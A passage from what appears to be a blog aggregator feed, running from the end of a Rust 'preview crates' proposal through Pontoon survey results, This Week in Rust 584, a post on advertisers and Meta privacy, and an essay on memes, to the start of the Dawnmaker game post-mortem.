The other tool we have for correct mistakes is editions. Editions let us change what syntax means and, because they are opt-in, all existing code continues to work.

Editions let us fix a great many things to make Rust more self-consistent, but they carry a heavy cost. They force people to relearn how things in Rust work. The make books oudated. This price is typically too high for us to ship a feature knowing that we are going to change it in a future edition.

Let’s give an example

To make this concrete, let’s take a specific example. The const generics team has been hard at work iterating on the meaning of const trait and in fact there is a pending RFC that describes their work. There’s just one problem: it’s not yet clear how it should be exposed to users. I won’t go into the rationale for each choice, but suffice to say that there are a number of options under current consideration. All of these examples have been proposed, for example, as the way to say “a function that can be executed at compilation time which will call T::default”:

  • const fn compute_value<T: ~const Default>()
  • const fn compute_value<T: const Default>()
  • const fn compute_value<T: Default>()

At the moment, I personally have a preference between these (I’ll let you guess), but I figure I have about… hmm… 80-90% confidence in that choice. And what’s worse, to really decide between them, I think we have to see how the work on async proceeds, and perhaps also what kinds of patterns turn out to be common in practice for const fn. This stuff is difficult to gauge accurately in advance.

Enter preview crates

So what if we released a crate rust_lang::const_preview. In my dream world, this is released on crates.io, using the namespaces described in [RFC #3243][https://rust-lang.github.io/rfcs/3243-packages-as-optional-namespaces.html]. Like any crate, const_preview can be versioned. It would expose exactly one item, a macro const_item that can be used to write const functions that have const trait bounds:

const_preview::const_item! {
    const fn compute_value<T: ~const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Interally, this const_item! macro can make use of internal APIs in the compiler to parse the contents and deploy the special semantics.

Releasing v2.0

Now, maybe we use this for a while, and we find that people really don’t like the ~, so we decide to change the syntax. Perhaps we opt to write const Default instead of ~const Default. No problem, we release a 2.0 version of the crate and we also rewrite 1.0 to take in the tokens and invoke 2.0 using the semver trick.

const_preview::const_item! {
    const fn compute_value<T: const Default>() {
        // as `~const` is what is implemented today, I'll use it in this example
    }
}

Integrating into the language

Once we decide we are happy with const_item! we can merge it into the language proper. The preview crates are deprecated and simply desugar to the true language syntax. We all go home, drink non-fat flat whites, and pat ourselves on the back.

User-based experimentation

One thing I like about the preview crates is that then others can begin to do their own experiments. Perhaps somebody wants to try out what it would be like it T: Default meant const by default–they can readily write a wrapper that desugars to const_preview::const_item and try it out. And people can build on it. And all that code keeps working once we integrate const functions into the language “for real”, it just looks kinda dated.

Frequently asked questions

Why else might we use previews?

Even if we know the semantics, we could use previews to stabilize features where the user experience is not great. I’m thinking of Generic Associated Types as one example, where the stabilization was slowed because of usability concerns.

What are the risks from this?

The previous answers hints at one of my fears… if preview crates become a widespread way for us to stabilize features with usability gaps, we may accumulate a very large number of them and then never move those features into Rust proper. That seems bad.

Shouldn’t we just make a decision already?

I mean…maybe? I do think we are sometimes very cautious. I would like us to get better at leaning on our judgment. But I also seem that sometimes there is a tension between “getting something out the door” and “taking the time to evaluate a generalization”, and it’s not clear to me that this tension is an inherent complexity or an artificial artifact of the way we do business.

But would this actually work? What’s in that crate and what if it is not matched with the right version of the compiler?

One very special thing about libstd is that it is released together with the compiler and hence it is able to co-evolve, making use of internal APIs that are unstable and change from release to release. If we want to put this crate on crates.io, it will not be able to co-evolve in the same way. Bah. That’s annoying! But I figure we still handle it by actually having the preview functionality exposed by crates in sysroot that are shipping along the compiler. These crates would not be directly usable except by our blessed crates.io crates, but they would basically just be shims that expose the underlying stuff. We could of course cut out the middleman and just have people use those preview crates directly– but I don’t like that as much because it’s less obvious and because we can’t as easily track reverse dependencies on crates.io to evaluate usage.

A macro seems heavy weight! What other options have you considered?

I also considered the idea of having p# keywords (“preview”), so e.g.

#[allow(preview_feature)]
p#const fn compute_value<T: p#const Default>() {
    // works on stable
}

Using a p# keyword would fire off a lint (preview_feature) that you would probably want to allow.

This is less intrusive, but I like the crate idea better because it allows us to release a v2.0 of the p#const keyword.

What kinds of things can we use preview crates for?

Good question. I’m not entirely sure. It seems like APIs that require us to define new traits and other things would be a bit tricky to maintain the total interoperability I think we want. Tools like trait aliases etc (which we need for other reasons) would help.

Who else does this sort of thing?

Ember has formalized this “plumbing first” approach in their version of editions. In Ember, from what I understand, an edition is not a “time-based thing”, like in Rust. Instead, it indicates a big shift in paradigms, and it comes out when that new paradigm is ready. But part of the process to reaching an edition is to start by shipping core APIs (plumbing APIs) that create the new capabilities. The community can then create wrappers and experiment with the “porcelain” before the Ember crate enshrines a best practice set of APIs and declares the new Edition ready.

Java has a notion of preview features, but they are not semver guaranteed to stick around.

I’m not sure who else!

Could we use decorators instead?

Usability of decorators like #p[const_preview::const_item] is better, particularly in rust-analyzer. The tricky bit there is that decorates can only be applied to valid Rust syntax, so it implies we’d need to extend the parser to include things like ~const forever, whereas I might prefer to have that complexity isolated to the const_preview crate.

So is this a done deal? Is this happening?

I don’t know! People often think that because I write a blog post about something it will happen, but this is currently just in “early ideation” stage. As I’ve written before, though, I continue to feel that we need something kind of “middle state” for our release process (see e.g. this blog post, Stability without stressing the !@#! out), and I think preview crates could be a good tool to have in our toolbox.


  1. Hat tip to Yehuda Katz and the Ember community, Tyler Mandry, Jack Huey, Josh Triplett, Oli Scherer, and probably a few others I’ve forgotten with whom I discussed this idea. Of course anything you like, they came up with, everything you hate was my addition. ↩︎

Mozilla Localization (L10N)2025 Pontoon survey results

The results from the 2025 Pontoon survey are in and the 3 top-voted features we commit to implement are:

  1. Add ability to preview Fluent strings in the editor (258 votes).
  2. Keep unsaved translations when navigating to other strings (252 votes).
  3. Hint at any available variants when referencing message (229 votes).

The remaining features ranked as follows:

  1. Add virtual keyboard with special characters to the editor (226 votes).
  2. Link project names in Concordance search results to corresponding strings (223 votes).
  3. Add a batch action to pretranslate a selection of strings (218 votes).
  4. Add ability to edit and remove comments (216 votes).
  5. Enable use of generic machine translation engines with pretranslation (209 votes).
  6. Add ability to report comments and suggestions for abusive content (193 votes).
  7. Add “Copy translation from another locale as suggestion” batch action (186 votes).

We thank everyone who dedicated their time to share valuable responses and suggest potential features for us to consider implementing!

Each user could give each feature 1 to 5 votes. A total of 154 Pontoon users participated in the survey, 68 of which voted on all features. The number of participants is lower than in the past years, since we only reached out to users who explicitly opted-in to email updates.

We look forward to implementing these new features and working towards a more seamless and efficient translation experience with Pontoon. Stay tuned for updates!

This Week In RustThis Week in Rust 584

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is embed_it, a crate that helps you to embed assets into your binary and generates structs / trait implementations for each file or directory.

Thanks to Riberk for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

408 pull requests were merged in the last week

Rust Compiler Performance Triage

Relatively quiet week, with one large-ish regression that will be reverted. #132666 produced a nice perf. win, by skipping unnecessary work. This PR actually reversed a regression caused by a previous PR.

Triage done by @kobzol.

Revision range: 9a1d156f..f7538506

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.5% [0.2%, 2.2%] 42
Regressions ❌
(secondary)
2.1% [0.1%, 11.6%] 56
Improvements ✅
(primary)
-0.8% [-4.2%, -0.1%] 107
Improvements ✅
(secondary)
-1.2% [-4.0%, -0.1%] 77
All ❌✅ (primary) -0.5% [-4.2%, 2.2%] 149

2 Regressions, 3 Improvements, 2 Mixed; 4 of them in rollups 45 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs
  • No New or Updated RFCs were created this week.

Upcoming Events

Rusty Events between 2025-01-29 - 2025-02-26 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I have experience in multiple styles of MMA gained from fighting the borrow checker, if that counts.

Richard Neumann on rust-users

Thanks to Jonas Fassbender for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don Martitime to sharpen your pencils, people

Mariana Olaizola Rosenblat covers How Meta Turned Its Back on Human Rights for Tech Policy Press. Zuckerberg announced that his company will no longer work to detect abuses of its platforms other than high-severity violations of content policy, such as those involving illicit drugs, terrorism, and child sexual exploitation. The clear implication is that the company will no longer strive to police its platform against other harmful content, including hate speech and targeted harassment.

Sounds like a brand-unsafe environment. So is another rush of advertiser boycott stories coming? Not this time. Lara O’Reilly reports that brand safety has recently become a political hot potato and been a flash point for some influential, right-leaning figures. In uncertain times, marketing decision-makers are keeping a low profile. Most companies aren’t really set up to take on the open-ended security risk of coming out against hate speech by users with friends in high places. According to the Fraternal Order of Police, the January 6 pardons send a dangerous message, and that message is being heard in marketing departments. The CMOs who boycotted last time are fully aware that stochastic terrorism is a thing, and that rage stories about companies spread quickly in Facebook groups and other extremist media. If an executive makes the news for pulling ads from Meta, they would be putting employees at risk from lone, deniable attacks. So instead of announcing a high-profile boycott, marketers are more likely to follow the example of Federal employees and do the right thing, by the book, and quietly.

Fortunately, big advertisers got some lower-stakes practice with the X (former Twitter) situation. Instead of either (1) staying on there and putting the brand at risk of being associated with material copied out of Henry Ford’s old newspaper or (2) risking getting snarled up in a lawsuit for pulling the X ads entirely, brands got the best of both by cutting way back on the actual money without dropping X entirely or saying much one way or the other.

And it’s possible for advertisers to reduce support for Meta without making a stink or drawing fire. Fortunately, Meta ads are hella expensive, and results can be unrealistic and unsustainable. Like all the Big Tech companies these days, Meta is coping with a slowdown in innovation by tweaking the ad rules to capture more revenue from existing services. As Jakob Nielsen pointed out back in 2006, in Search Engines as Leeches on the Web, ad platforms can even capture the value created by others. A marketer doesn’t have to shout ¡No Pasarán! or anything—just sharpen your best math pencil, quietly go through the numbers, spot something that looks low-ROAS or fraudulent in the Meta column, tweak the budget, repeat. If users can dial down Meta, so can marketers. (Update: Richard Kirk writes, Brands could be spending three times too much on social. You read that right. Read the math, do the math.) And if Meta comes out with something new and risky like the adfraud in the browser thing, Privacy-Preserving Attribution, it’s easy to use the fraud problem as the reason not to do it—you don’t have to stand up and talk politics at work.

From the user side

It’s not that hard to take privacy measures that result in less money for Big Tech. Even if you can’t quit Meta entirely, some basic tools and settings can make an impact, especially if you use both a laptop and a phone, not just a phone. With a few minutes of work, an individual in the USA can, in effect, fine the surveillance business about $50/month.

My list of effective privacy tips is prioritized by how much I think they’ll cost the surveillance business per minute spent. A privacy tips list for people who don’t like doing privacy tips but also don’t like creepy oligarchs. (As they say in the clickbait business, number 9 will shock you: if you get your web browser info from TV and social media, you probably won’t guess which browsers have built-in surveillance and/or fraud features.) That page also has links to more intensive privacy advice for those who want to get into it.

A lawyer question

As an Internet user, I realize I can’t get to Meta surveillance neutral just with my own privacy tools and settings. For the foreseeable future, companies are going to be doing server-to-server tracking of me with Meta CAPI.

So in order to get to a rough equivalent of not being surveilled, I need to balance out their actual surveillance by introducing some free speech into the system. (And yes, numbers can be speech. O, the Tables tell!) So what I’d like to do is write a surrogate script (that can be swapped in by a browser extension in place of the real Meta Pixel, like the surrogate scripts uBlock Origin uses) to enable the user to send something other than valid surveillance data. The user would configure what message the script would send. The surrogate script would then encode the message and pass it to Meta in place of the surveillance data sent by the original Meta script. There is a possible research angle to this, since I think that in general, reducing ad personalization tends to help people buy better products and services. An experiment would probably show that people who mess with cross-context surveillance are happier with their purchases than those who allow surveillance. Releasing a script like that is the kind of thing I could catch hell for, legally, so I’m going to wait to write it until I can find a place to host it and a lawyer to represent me. Anyone?

Related

Big Tech platforms: mall, newspaper, or something else?

Sunday Internet optimism

Bonus links

After Big Social. Dan Phiffer covers the question of where to next. I am going into this clear-eyed; I’m going to end up losing touch with a lot of people. For many of my contacts, Meta controls the only connection we have. It’s a real loss, withdrawing from communities that I’ve built up over the years (or decades in the case of Facebook). But I’m also finding new communities with different people on the networks I’m spending more time in.

No Cookies For You!: Evaluating The Promises Of Big Tech’s ‘Privacy-Enhancing’ Techniques Kirsten Martin, Helen Nissenbaum, and Vitaly Shmatikov cover the problems with privacy-enhancing Big Tech features. (Not everything with privacy in its name is a privacy feature. It’s like open I guess.)

The Mozilla BlogIYKYK: The secret language of memes

A meme-style image featuring a man looking back in surprise while his female companion gestures in disbelief, overlaid with colorful speech bubbles saying "IKR?" and emoji-style icons.

A smiling woman with long dark hair, wearing colorful earrings and a navy blue polka dot top, in front of a turquoise background.
Dr. Erica Brozovsky is a sociolinguist, a public scholar and a lover of words. She is the host of Otherwords, a PBS series on language and linguistics, and a professor of writing and rhetoric at Worcester Polytechnic Institute. You can find her at @ericabrozovsky on most platforms. Photo: Kelly Zhu

If you’ve been on the internet anytime in the past 25 years, there’s a good chance you’ve seen a meme, shared a meme, or perhaps even created a meme. From the LOLcats and Advice Animals of the mid 2000s to the many emotions of Moo Deng, the world’s favorite pygmy hippopotamus, internet memes allow us to share pieces of media that we find funny, ironic or relatable.

Author Mike Godwin coined the term “internet meme” in the June 1993 edition of Wired magazine. However, that wasn’t the advent of the word meme. In his 1976 book, “The Selfish Gene,” evolutionary biologist Richard Dawkins conceived the term to represent “ideas, behaviors, or styles that spread from person to person.” If you think that sounds a bit contagious, you’re absolutely correct. Much as contagion spreads, so does the imitation of ideas in the form of memes, circulating humor across society.

But who claims the crown of first ever internet meme? Is it the 1998 Hamster Dance gif created by ​​Deidre LaCarte as a GeoCities page?

Or is it the 1996 Autodesk Dancing Baby that has now become an NFT? (Creator Michael Girard claims so.)

Those definitely went viral, but are they memes? Perhaps not. A funny image (or gif or video) is just a funny image… or gif, or video… unless it achieves the two keys to memehood: inspiring creative variations (that are then copied and spread) and being imbued with cultural context, like that Pepperidge Farm meme (iykyk).

from Imgflip Meme Generator

The Cow Guide, for example, might be considered a precursor to the internet meme.

Full of ASCII character drawings of variations on cows, The Cow Guide spread on Usenet in the ‘80s and ‘90s (pre-World Wide Web), with people adding new cows with every repost. While memes do exist offline, internet memes really took off in the 2000s within anonymous web communities like 4chan — which required images with each post — and Reddit and Tumblr, which debuted in 2003, 2005, and 2007, respectively. In the late aughts, internet curators like BuzzFeed and social media sites made memes more mainstream. And now they’re everywhere.

Meme culture is so quick, with turnaround and multiple iterations within minutes of an event happening. Even if the source material is a real and consequential topic, a funny meme brings attention, as humor and levity travels further and faster than seriousness and sincerity. 

Global and national events (like the Olympics and the U.S. presidential election) are goldmines for meme-able opportunities that allow information to spread faster than the traditional news cycle. Take, for instance, Stephen Nedoroscik, Team USA’s horse powerhouse, who became the subject of countless memes for his incredible performance and comparisons to Clark Kent.

But how is it that memes are significant enough to have given rise to an entire academic field — memetics — and a category in the Library of Congress? The U.K.’s National Science and Media Museum is even putting this absolute unit on display as their first “digitally-born object.”

Are memes useful for more than just laughs or, more realistically, those small exhales through the nose of mild amusement?

Definitively, yes. Here’s a comparison: A minute is a unit of time, a meter is a unit of measure, and a meme is a unit of culture. Today internet memes (which we’ll just call memes) can be described as “units of popular culture that are circulated, imitated, and transformed by internet users, creating a shared cultural experience.” The key part of that definition is the creation of a shared cultural experience. That seems pretty deep for something so trivial as a reaction GIF or silly picture with text slapped on it, but it’s true. 

Think of it this way: Have you ever made a reference, maybe to a movie, a song lyric, a book or a funny TikTok you saw, only to be met with silence or questioning looks from the group you’re talking to? When even just one other person gets the reference, you feel a sense of kinship; you know the two of you have something in common. This is what happens with memes. The internet is so vast now that we’re not all part of the same communities online, so when you “get” a meme, there’s a shared sense of humor and a feeling of belonging. And laughing together strengthens relationships and fosters community, making you feel close

Nowadays, memes have grown into the mainstream, many making it outside of their original subculture to become widely culturally relevant. And the faces behind some popular memes have gained celebrity status even offline. Case in point: In early November 2024, the people beyond three iconic memes of the 2010s met up, causing an internet uproar. 

There’s a meme out there for every facet of your identity and every interest you hold, from a corporate job to a keen interest in birdwatching to crossovers between Pokémon and Thomas the Tank Engine. When multiple specific interests collide in a meme… well there’s a reason the phrase “I’ve never had an original thought or experience” became so popular online.

That’s not even touching the surface of the weird, wild and wonderful world of niche memes. And that is exactly where the hyper-specific meme shines in its ability to broker connections. If you can parse through the layers of meaning and referential humor, then you’re part of the exclusive club of people in the know. 

Today, we can be defined by the media we consume, so understanding a meme, especially if it’s highly intertextual and referential, gives insight into who a person is and what corners of the internet they inhabit. Memes serve as inside jokes for subcommunities online, and the more iterations and riffs on the joke, the higher barrier to entry for outsiders, further cementing the group’s identity. If you understand a niche meme, you come to realize you’re part of a very specific collective of internet users, for better or for worse.

A meme is a digital manifestation of a shared online experience and interaction. They have set structures and social dynamics, and by intertextually referencing various pop culture tokens, they show affiliation and affinity to specific internet subgroups. They subtly ask if you understand, and if you do (and iykyk), you’re initiated into the club as “one of us, one of us!” Memes are not random. They’re created to appeal to a specific chosen audience who will then hopefully pass on the meme like a contagion of amusement because they identify with it. 

We share memes because we assume our audience, upon wading through the subtext, will find them worthwhile, whether because of humor or in-group membership. Whether posting into the void that is Tumblr or 4chan or Reddit, or sending memes directly to your friends or family in a form of digital pebbling — like penguins presenting smooth stones to their prospective mates in courtship rituals — spreading these internet cultural tokens is a bid for social connection. And through that connection, we show affiliation with others who understand the digital inside joke that is a shared piece of popular culture. Memes are cultural artifacts and efficient forms of communication to those who understand the context. And oftentimes they’re funny, which is just an added bonus. Put simply, humans crave connection, and memes just do it for us. 

Get Firefox

Get the browser that protects what’s important

The post IYKYK: The secret language of memes appeared first on The Mozilla Blog.

Adrian Gaudebert3 years of intense learning - The Dawnmaker Post-mortem

It's been 3 years since I started working on Dawnmaker full-time with Alexis. The creation of our first commercial game coincided with the creation of Arpentor Studio, our company. I've shared a lot of insights along the way on this blog, from how we made our first market research (which was incredibly wrong) to how much we made with our game (look at the difference between the two, it's… interesting). I wrote a pretty big piece were I explained how we built Arpentor Studio. I wrote a dozen smaller posts about the development of Dawnmaker. And I shared a bunch of my feelings, mistakes and successes in my yearly State of the Adrian posts (in French only, sorry).

But today, I want to take a step back and give a good look at these last 3 years. It's time for the Dawnmaker post-mortem, where I'm going to share what I believe we did well, what we did wrong, and what I've learned along the way. Because Dawnmaker and Arpentor Studio are so intertwined, I'm inevitably going to talk about the studio as well, but I think it makes sense. Let's get started!

What we did

Let's get some context first. Dawnmaker is a solo strategy game, mixing city building and deckbuilding to create a board game-like experience. It was released in July 2024 on Steam and itch.io. The team consisted of 2 full-time people, with occasional help from freelancers. My associate Alexis took care of everything related to graphics, and I did the programming and game design of the game. If you're interested in how much the game sold, I wrote a blog post about this: 18 days of selling Dawnmaker.

Dawnmaker capsule

I created the very first prototype of what would become Dawnmaker back in the summer of 2021, but we only started working on the game full-time in December of that year. We joined a local incubator in 2022, which kind of shook our plans: we spent a significant portion of our time working on administrative things around the game, like making pitch decks and funding briefs. We had to create a company earlier than we had planned to ask for public funding. So in 2022 we only spent about half our time actually working on developing the game. In 2023, after having been rejected our main source of funding, we shrunk down our ambitions and focused on just making the game. We still spent time to improve our pitch deck and contacted some publishers, but never managed to secure a deal. In early 2024, we decided to self-publish, started our Steam page and worked on promoting the game while polishing what we had.

Because we never found a publisher, we never had the money to do the production phase of Dawnmaker. That means the game shipped with about half the content we wanted it to have. Here are my definitions of the different phases of a game project, as I'll refer to them later on in this article:

  1. Ideation — The phase where we are defining the key concepts of the game we want to make. There's some early prototyping there, as well as research. The goal is to have a clear picture of what we want to build.
  2. Pre-production — The phase where we validate what the core of the game is, that it is fun, and that we will be able to actually deliver it. It can be cut down into three steps: prototyping, pre-production and vertical slice. In prototyping we validate the vision of the game. In pre-production (yes, it's the same name as the phase, but that's what I was taught) we build our production pipeline. During the vertical slice, we validate that the pipeline works and finalize the main systems of the game.
  3. Production — The phase where we build the content of the game. This phase is supposed to be one that can be planned very precisely, because the pre-production has supposedly removed almost all the unknowns.
  4. Post-production — The phase where we polish our game and take it through the finish line.

Now that you have some context, let's get into the meat of this article!

What we did right

Let's start this post-mortem on a positive note, and list the things that I believe we did well. First and foremost, we actually shipped a game! Each game that comes out is a little miracle, and we succeeded there. We kept our vision, we pushed it as far as we could, and we did not give up. Bravo us!

Good game quality

What's more, our game has been very well received: at the time of writing, we have a 93% positive review ratio on Steam, from 103 reviews. I am of course stoked that Dawnmaker was liked by that many reviewers. I think there are 3 main reasons why we had such positive reviews (other than the game being decently fun, of course):

  1. We kept a demo up at all times, even after the release, meaning that tentative customers could give it a try before buying. If they didn't like the demo, they didn't buy the game — not good for us — but then they were not disappointed by a product they bought — good for them and for our reviews!
  2. We were speaking to a very small niche, but provided something that was good for them. The niche is a weird intersection of deckbuilding, city building and board game fans. It was incredibly difficult to find and talk to, probably because it is, as I said, very small, but we made something that worked very well for those players.
  3. We under-priced the game aggressively (at $9.99) to lower the players' expectations. That actually transpired in the reviews, where a few people mentioned that the game had flaws, but they tolerated them because of the price tag. (Note: the game has since been moved up to a $14.99 price point by our new publisher.)

Of course, had the game been bad, we would not have had those reviews at all. So it goes to say that Dawnmaker is a fine game. For all its flaws, it is fun to play. I've played it a lot — as I guess do all game creators with their creation — and it took me a while to get bored with it. The median playtime on Steam is 3 hours and 23 minutes, with an average playtime of 8 hours and 17 minutes. Here's a stat that blows my mind: at the time of writing, 175 people (about 10% of our players) have played Dawnmaker for more than 20 hours. At least 15 people played it for more than 50 hours. I know this is far from the life-devouring monsters that are out there, like Civilization, Skyrim, Minecraft or GTA, but for our humble game and for me, that's incredible to think about.

So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot into a 2D board. That simplified a lot of things in terms of programming, of performance, and made us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and for which I am particularly proud: the game had very few bugs upon release, and none were blocking. I've achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier done when there is a single programmer, who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or such cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well, that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The end game would be to be able to realistically be making my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start by the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example, no 3D, no narration, no NPCs, etc. ) and keep to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. It was initially supposed to be a game that we wanted to make in about a year. We ended up working on it for more than two years and a half instead! There are several reasons why the scope got so out-of-control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed in having a long-term planning, with hard dates for key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that it would not sell significantly better by working more. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, insidiously we found ourselves working on a 2 to 3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousands of euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But, we should never start working on the "dream" game until the money is on our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we saw our game bigger than it ended up being, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discussed in the previous section, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

